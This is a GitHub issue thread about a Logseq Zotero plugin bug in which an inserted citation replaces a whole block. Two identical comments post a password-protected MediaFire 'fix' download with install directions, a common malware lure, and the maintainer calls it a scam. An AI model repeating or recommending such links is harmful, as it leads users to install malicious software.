### ISSUE TITLE
Inserted citation replaced the entire block

### ISSUE THREAD

**Issue by benjypng** [benjypng/logseq-zoterolocal-plugin#21]
From [Discord](https://discord.com/channels/725182569297215569/752845167030960141/1279951352973361244):

> In the Journals table, I copied a quote. I set the insertion point to the end of the quote, and then hit "/". I typed "Zotero" and chose "Zotero: Cite (insert citation)". I typed a few letters to find the reference I needed, then I clicked the reference." Result: the inserted citation replaced the entire block!

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by benjypng** [comment]
> hi bro, to fix your trouble try this fix, i see it in another issue,
> 
> https://app.mediafire.com/dqajf1x14ccfd
> 
> password: changeme
> 
> when you installing it, you need to place a check in install to path and select usx

Loser scammer.
